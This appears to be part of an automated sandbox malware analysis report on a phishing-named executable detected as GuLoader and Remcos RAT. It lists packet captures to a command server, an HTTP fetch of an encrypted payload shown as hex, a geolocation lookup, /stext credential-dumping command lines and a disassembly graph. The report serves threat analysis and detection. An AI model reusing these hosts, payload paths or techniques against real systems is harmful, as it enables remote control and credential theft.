                                                                                                                                                                                                                                        Sep 27, 2024 16:46:24.786254883 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:38.620393991 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:38.622440100 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:38.803972006 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:40.595225096 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:08.626425982 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:08.627995014 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:08.808872938 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:38.636224985 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:38.638591051 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:38.820950985 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:08.660093069 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:08.661897898 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:08.862052917 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:38.661603928 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:38.664521933 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:38.846735954 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:08.681679964 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:08.684083939 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:08.860243082 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:38.806499958 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:38.867887020 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:38.883485079 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:39.058490992 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:08.811553955 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:08.882209063 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:09.057790995 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:38.817245007 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:38.819824934 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:39.003118992 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:51:08.820648909 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:51:08.821787119 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:51:09.003540993 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:51:38.826916933 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:51:38.828749895 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:51:39.010828972 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:52:08.839488983 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:52:08.841413975 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:52:09.021608114 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:52:38.845864058 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:52:38.846209049 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:52:39.030919075 CEST2600049736102.165.14.28192.168.11.20

                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.825634956 CEST6282653192.168.11.201.1.1.1
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.937058926 CEST53628261.1.1.1192.168.11.20

                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.825634956 CEST192.168.11.201.1.1.10xbbaeStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.937058926 CEST1.1.1.1192.168.11.200xbbaeNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                        • 102.165.14.28
                                                                                                                                                                                                                                        • geoplugin.net

                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.11.2049735102.165.14.28805888C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.572277069 CEST175OUTGET /dYaWuYrfJW197.bin HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                                        Host: 102.165.14.28
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723642111 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Last-Modified: Fri, 27 Sep 2024 08:46:51 GMT
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        ETag: "f6bcecbb910db1:0"
                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                        Date: Fri, 27 Sep 2024 14:44:19 GMT
                                                                                                                                                                                                                                        Content-Length: 494656
                                                                                                                                                                                                                                        Data Raw: ed 09 9e 6a a3 fa bc a4 5b b3 4d af af 1e f3 76 da 01 f5 84 f1 a3 55 55 57 41 f6 5c d3 c1 45 0a e1 40 13 a9 a2 d0 17 7f da 89 86 23 30 d3 5b 47 48 a5 fb d4 f3 33 48 5f 65 bc f6 41 6a 20 9d 3a bc f8 45 ad 9c 86 43 b7 c1 64 dc 31 cb 10 3a 22 04 2b b6 bf ec e1 58 eb 15 f9 de cb d6 1a e7 57 04 07 a5 ce 81 d5 a7 ff 56 a0 0e ff 6e eb 8f 8a a9 a4 6e 26 7a f6 ef fd 89 80 e5 32 d7 4f b9 7a 79 92 db 4b 65 af c3 44 3b 79 23 81 d2 ab e9 00 b5 01 2d 6c e2 e3 fc b3 4d 6e d0 21 72 df 30 2f 22 3e 3b 9f 3a 87 3a aa 07 db 10 3e ed f8 b7 23 d4 a4 40 ef 0c ce 93 46 d3 c7 be f6 1d 0d 0a 8a 87 d2 3e 6a 9a 1a 66 65 de 59 d2 fb 1c f9 67 1a 79 ff 3c 01 e3 c8 63 02 f4 c9 2b d6 bc c1 28 c3 9e 42 87 98 69 fe bf 44 d5 83 e1 c2 db 84 ab 50 1e a1 fb e7 57 82 8a 8b fc 23 49 56 36 13 42 7e 28 a9 e1 be fd f6 8b 4c cc 67 be 47 1d 94 c5 67 28 b4 84 82 f9 48 ff 1c e3 4a cf fc 4f 2a 79 21 56 56 9a 30 e2 90 13 09 4c f3 ae 3e 23 68 f8 47 c9 3a 50 70 6d 13 60 15 c2 bc 5a 85 22 40 55 65 ed 78 4b ac 8c 54 60 93 fe 86 ad b8 3b 07 1b 23 63 5e [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: j[MvUUWA\E@#0[GH3H_eAj :ECd1:"+XWVnn&z2OzyKeD;y#-lMn!r0/">;::>#@F>jfeYgy<c+(BiDPW#IV6B~(LgGg(HJO*y!VV0L>#hG:Ppm`Z"@UexKT`;#c^mdP}fP9SU/`ZB2b:y'-lz!w~J5kj1)2d%LT;l$M&GSip_$[aZZ5n_x;jia0il4[=(80HRlv7.$[SJ|KcM_nN"nFhub.WHeAN^.6[mmh:!QQ@<,]aZ1H=,WJ$a8T*4dF/3=^A:wlgxVwQ)H`",V}_+,$`$_`oOyS6U!3{pFgp3.aI^`=Y,4n3MoPx]aX<[^k_F AI$&x,aeJ0gnIPdtSlzEef\7dmR@wDe24DX.s*V#9h,5^F&pK [TRUNCATED]
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723656893 CEST1289INData Raw: be eb a1 13 c7 9e 3e b6 41 fc ab 1b 01 11 00 2a 8f e7 38 d6 45 cc 16 4c 4c 39 ff 9a 83 0d ad 44 50 9b 07 a7 49 d5 50 5c 99 30 06 c0 f8 d1 43 01 3d d4 01 91 1e 6b ff a8 9c c6 8d e1 77 e9 52 57 de bb 43 19 8e f8 73 e4 1c f9 07 ac 4a 64 fa 23 8e d8
                                                                                                                                                                                                                                        Data Ascii: >A*8ELL9DPIP\0C=kwRWCsJd#m4O\OgQNC>)*~RCKp5vBrY1nn#b;F2O5J6E^$rKvZYQ5&^DLm[*(9=j)>>h,(&
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723669052 CEST1289INData Raw: 39 e1 95 5e f8 e8 db be b9 43 d9 89 c9 09 9a 6e 1a c4 e0 38 c4 fb d8 d8 b3 e9 28 09 60 f2 e7 38 c2 39 50 55 0b 20 82 78 fe 87 bc fb fa 07 82 90 5a b4 66 64 33 94 97 74 dd 00 26 40 37 c6 46 37 09 db b0 b2 2d 0c 91 12 f0 f9 13 58 db 27 4a 19 ab 15
                                                                                                                                                                                                                                        Data Ascii: 9^Cn8(`89PU xZfd3t&@7F7-X'J<RjVbwAH?wm{A|O5})_;C1;wi8Ll7Z63;mw$e6dcz-nRAF/?vQHJX^D)DqL
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723680019 CEST1289INData Raw: 64 72 bd 9a df 9e e2 72 9a cd 89 18 cc 6a a5 a0 cb f1 ab 09 80 ee 8e 63 e6 75 be 9b 30 b9 ab c5 b7 1c 45 45 87 bf 54 fd 28 06 12 ea dc 06 b5 d9 c8 6c cb a5 f0 c6 e9 87 87 d1 d4 47 d3 9b 11 bb 0e 57 f9 9e f3 b3 3c 11 e2 7f 9c 02 ad f1 5c 58 5c 00
                                                                                                                                                                                                                                        Data Ascii: drrjcu0EET(lGW<\X\4,ga&0v+4v?vai5|l6^+l}qfRJj+DxIn`A:U1'b}GHeA[Gz>tk2Fm#6xLC~a"0ey)P
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723690987 CEST1289INData Raw: cb 04 b7 2d 0d de 31 34 85 3a 48 bc c3 15 cd ef e1 94 02 74 fa de cb bc 1a 8d 56 ec 47 a6 ce 81 16 f2 74 ba f1 5d 74 33 e3 d8 01 50 9f 95 52 20 9c ef 97 88 68 c2 31 cf 4e 32 b1 9f 6c 63 45 65 4b 41 46 f2 18 20 cd 1f da 55 6b cd 72 0d 45 c9 08 5b
                                                                                                                                                                                                                                        Data Ascii: -14:HtVGt]t3PR h1N2lcEeKAF UkrE[U}:fZ~O?;_Ba|5SAVK?WB&@]wxYQb?o-X#9Sg`}2p]]`D#XlEWACO)q*j/}\=
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723702908 CEST1289INData Raw: f6 d9 9b 38 1e 70 3a b2 fd ad 5a 30 53 fb 91 7e 73 23 93 ec 5e 22 5b 71 dd f4 59 c9 88 70 18 87 c6 34 84 5f bc e4 5c 13 01 2d dc 23 11 1f cc cc 17 c8 ff 43 ff d3 d1 5c 1a b0 ef 0b e1 1b 75 76 36 e7 68 36 a1 46 08 1f 85 03 dd 37 2a ca 9e 0e e1 89
                                                                                                                                                                                                                                        Data Ascii: 8p:Z0S~s#^"[qYp4_\-#C\uv6h6F7*jq~}|86'8_{HeFNtN8Zq t;CHRgKd$L45h|w,CJujvqq_z,IayC9T.?POF-zV;[b
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723714113 CEST1289INData Raw: 03 50 ad c5 de 7a 02 a4 d6 d4 ae 63 a6 b8 32 be eb 4a 21 47 e2 1a a6 41 88 b4 98 ff 01 73 30 04 28 d0 c5 bc 33 e9 c7 83 b2 ff a1 73 02 ef 82 00 f1 06 4f da 2f af a3 72 85 e7 7b ca db fd f6 fd 3c 11 f9 96 14 3f 5e 2b 24 2f 22 29 72 99 ee 4a ba fb
                                                                                                                                                                                                                                        Data Ascii: Pzc2J!GAs0(3sO/r{<?^+$/")rJ6o;2BpDu%TrEFxvMaYNrI7bnpVI%Sfq1[bZUubWM,UQW$3}hcqC
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723726034 CEST1289INData Raw: ab e2 65 f9 91 f8 e6 79 a8 31 98 2a fb f0 c2 a4 2e ee 0e d8 c5 da a9 a1 59 d6 76 d5 ee 17 c3 9e c4 14 f4 44 3f 8d d9 d3 24 40 52 60 1a 18 5b 29 27 09 96 63 ae c1 39 fe 86 68 c9 f9 07 8a bb 2a 55 e7 21 6a be 74 46 37 2b 7f 83 8e ae cd da a3 39 41
                                                                                                                                                                                                                                        Data Ascii: ey1*.YvD?$@R`[)'c9h*U!jtF7+9Ab(^Ym^frsXF}JkuK/|X]#p$Y*5zL=\aeFp)qUuNI\F%%5[%DWB7nKFA8\O *CSs;p^
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723737001 CEST1289INData Raw: da dd cc 86 c8 49 1b a0 89 08 3c f7 fb a5 ed 0d 77 bd 9a 2e c7 c4 25 72 65 69 1d cf 3f bc a8 84 a1 4c 64 dc f9 da ab cc 32 ee e9 60 29 b4 4e e7 7f 39 60 13 07 04 98 b2 f3 05 59 5f 3b e1 e2 04 a2 dc 08 fc 4d 26 e4 49 a1 5f a2 df d2 ce 53 ff 86 93
                                                                                                                                                                                                                                        Data Ascii: I<w.%rei?Ld2`)N9`Y_;M&I_S+iavZ(XD;R.m9.8Vm7HHr87yX^j+$-h|::DI\bKejNr<kF]D0n**
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.723747969 CEST1289INData Raw: 5a 03 a9 2d 10 1c ac 30 ea 7f 0e a1 91 89 83 d6 ab 69 18 9b 23 b2 f0 e3 b1 ec e9 c3 ac 4e 13 1e 07 60 93 a4 80 90 14 0a e7 dc ca ef f0 3e 7e 2a 6b ac 00 f7 64 ff e5 1a 67 a6 59 5b 91 ad 26 d2 f7 76 c5 a4 f1 61 27 50 49 85 88 72 15 61 79 90 86 ad
                                                                                                                                                                                                                                        Data Ascii: Z-0i#N`>~*kdgY[&va'PIrayuB,ed>GZb5s'+aNwHP7A~[YO+~z:mGr,/WX:5#HZUma"1XA;9kp+oH$wf B9rVCED
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.859062910 CEST1289INData Raw: 21 b1 f3 8b 10 21 c4 f5 f2 9d e5 47 8d d0 c0 d2 24 6d a9 c5 9b 69 9d fa 6f 59 f5 5a 43 39 72 8f 2e 6f d4 de 25 07 12 0d a7 68 76 5b 4b 60 28 1c 8f 9e 4a a7 e4 28 50 a5 76 fb 20 d2 69 5a 44 11 71 4c af 01 2c d1 7d d6 6e 80 3a d9 18 3e 52 12 6c 4e
                                                                                                                                                                                                                                        Data Ascii: !!G$mioYZC9r.o%hv[K`(J(Pv iZDqL,}n:>RlNqLWFBjNY7U9Lsd+'wAAr:/yn^QZ"'M#8PEz7f8Vy9E+J^yVF


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.11.2049737178.237.33.50805888C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.135325909 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.336378098 CEST1171INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        date: Fri, 27 Sep 2024 14:44:22 GMT
                                                                                                                                                                                                                                        server: Apache
                                                                                                                                                                                                                                        content-length: 963
                                                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 41 73 68 62 75 72 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"79.127.132.20", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Ashburn", "geoplugin_region":"Virginia", "geoplugin_regionCode":"VA", "geoplugin_regionName":"Virginia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"39.0469", "geoplugin_longitude":"-77.4903", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:10:43:56
                                                                                                                                                                                                                                        Start date:27/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:830'698 bytes
                                                                                                                                                                                                                                        MD5 hash:97249FEAAA2DD67AF540E7615533294C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2950982254.00000000055B5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:10:44:09
                                                                                                                                                                                                                                        Start date:27/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:830'698 bytes
                                                                                                                                                                                                                                        MD5 hash:97249FEAAA2DD67AF540E7615533294C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.7792890064.00000000025B5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:10:44:22
                                                                                                                                                                                                                                        Start date:27/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hvglntqjpwxqeafzzxxpsjflkurl"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:830'698 bytes
                                                                                                                                                                                                                                        MD5 hash:97249FEAAA2DD67AF540E7615533294C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:10:44:22
                                                                                                                                                                                                                                        Start date:27/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\sptdomaclepvggbdihsivorutbiuqfu"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:830'698 bytes
                                                                                                                                                                                                                                        MD5 hash:97249FEAAA2DD67AF540E7615533294C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:10:44:22
                                                                                                                                                                                                                                        Start date:27/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\cjzw"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:830'698 bytes
                                                                                                                                                                                                                                        MD5 hash:97249FEAAA2DD67AF540E7615533294C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:27.5%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:30%
                                                                                                                                                                                                                                          Signature Coverage:21.1%
                                                                                                                                                                                                                                          Total number of Nodes:700
                                                                                                                                                                                                                                          Total number of Limit Nodes:17
                                                                                                                                                                                                                                          execution_graph 2930 10001000 2933 1000101b 2930->2933 2940 10001516 2933->2940 2935 10001020 2936 10001024 2935->2936 2937 10001027 GlobalAlloc 2935->2937 2938 1000153d 3 API calls 2936->2938 2937->2936 2939 10001019 2938->2939 2941 1000151c 2940->2941 2942 10001522 2941->2942 2943 1000152e GlobalFree 2941->2943 2942->2935 2943->2935 2944 100010e1 2953 10001111 2944->2953 2945 100011d8 GlobalFree 2946 100012ba 2 API calls 2946->2953 2947 100011d3 2947->2945 2948 10001272 2 API calls 2951 100011c4 GlobalFree 2948->2951 2949 10001164 GlobalAlloc 2949->2953 2950 100011f8 GlobalFree 2950->2953 2951->2953 2952 100012e1 lstrcpyW 2952->2953 2953->2945 2953->2946 2953->2947 2953->2948 2953->2949 2953->2950 2953->2951 2953->2952 2677 100027c2 2678 10002812 2677->2678 2679 100027d2 VirtualProtect 2677->2679 2679->2678 3004 100018a9 3005 100018cc 3004->3005 3006 10001911 3005->3006 3007 100018ff GlobalFree 3005->3007 3008 10001272 2 API calls 3006->3008 3007->3006 3009 10001a87 GlobalFree GlobalFree 3008->3009 3013 1000164f 3014 10001516 GlobalFree 3013->3014 3016 10001667 3014->3016 3015 100016ad GlobalFree 3016->3015 3017 10001682 3016->3017 3018 10001699 VirtualFree 3016->3018 3017->3015 3018->3015 2190 403350 SetErrorMode GetVersion 2191 403395 2190->2191 2192 40338f 2190->2192 2281 4065c9 GetSystemDirectoryW 2191->2281 2193 406639 5 API calls 2192->2193 2193->2191 2195 4033ab lstrlenA 2195->2191 2196 4033bb 2195->2196 2284 406639 GetModuleHandleA 2196->2284 2199 406639 5 API calls 2200 4033c9 2199->2200 2201 406639 5 API calls 2200->2201 2202 4033d5 #17 OleInitialize SHGetFileInfoW 2201->2202 2290 40625f lstrcpynW 2202->2290 2205 403421 GetCommandLineW 2291 40625f lstrcpynW 2205->2291 2207 403433 GetModuleHandleW 2208 40344b 2207->2208 2292 405b5d 2208->2292 2211 403584 GetTempPathW 2296 40331f 2211->2296 2213 40359c 2214 4035a0 GetWindowsDirectoryW lstrcatW 2213->2214 2215 4035f6 DeleteFileW 2213->2215 2217 40331f 12 API calls 2214->2217 2306 402ec1 GetTickCount GetModuleFileNameW 2215->2306 2216 403473 2218 405b5d CharNextW 2216->2218 2223 40356d 2216->2223 2225 40356f 2216->2225 2221 4035bc 2217->2221 2218->2216 2220 40360a 2227 405b5d CharNextW 2220->2227 2263 4036ad 2220->2263 2276 4036bd 2220->2276 2221->2215 2222 4035c0 GetTempPathW lstrcatW SetEnvironmentVariableW 